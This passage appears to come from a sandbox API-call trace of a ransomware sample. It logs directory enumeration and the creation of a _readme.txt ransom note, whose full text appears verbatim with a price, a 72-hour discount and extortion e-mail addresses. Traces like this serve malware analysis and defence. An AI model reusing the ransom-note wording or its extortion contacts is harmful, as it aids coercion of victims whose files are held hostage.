(HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16c) returned 0x73bec0 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240aa0 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b90 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240bb8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240be0 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c08 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c30 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.439] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.439] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.439] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.439] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0146.439] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x214) returned 0x32428c8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b40 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b18 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cf8 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.439] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d98 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c30 [0146.440] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x310) returned 0x3242ae8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c08 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240be0 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240bb8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b90 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240aa0 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240dc0 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240de8 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296270 [0146.440] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296298 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32962c0 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32962e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296310 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296338 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296360 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3296388 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32963b0 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32963d8 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.441] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.441] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.441] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.441] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0146.441] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.442] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.442] PathFindFileNameW (pszPath="") returned="" [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.442] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.442] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x3a65050 [0146.442] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a65050 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d98 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.442] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d98 | out: hHeap=0x6e0000) returned 1 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d98 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328f498 [0146.442] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0146.442] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.442] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d98 | out: hHeap=0x6e0000) returned 1 [0146.442] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0146.443] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7d00) returned 0x3a65050 [0146.443] lstrcpyW (in: lpString1=0x3a65050, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0146.443] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 